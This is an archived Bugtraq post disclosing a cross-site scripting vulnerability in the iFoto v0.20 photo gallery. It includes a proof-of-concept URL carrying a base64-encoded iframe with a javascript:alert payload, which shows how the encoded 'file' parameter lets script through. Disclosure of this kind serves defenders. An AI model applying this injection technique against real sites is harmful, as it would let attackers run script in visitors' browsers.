Bugtraq mailing list archives

iFoto v0.20-06/06/06

From: luny () youfucktard com
Date: 8 Jun 2006 21:31:39 -0000

iFoto v0.20-06/06/06

Homepage:
http://ifoto.ireans.com/

Effected files:

XSS Vulnerability:

The dir path to show the image is base 64 encoded, so to attempt this XSS example we encode our codein base64.

The code we'll be using is javascript in an iframe tag. [IFRAME SRC="javascript:alert('XSS');"][/IFRAME]

http://www.example.com/?dir=Scene&file=PElGUkFNRSBTUkM9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpOyI+PC9JRlJBTUU+

Current thread:

iFoto v0.20-06/06/06 luny (Jun 09)
- <Possible follow-ups>
- Re: iFoto v0.20-06/06/06 aizu . ikmal (Jun 12)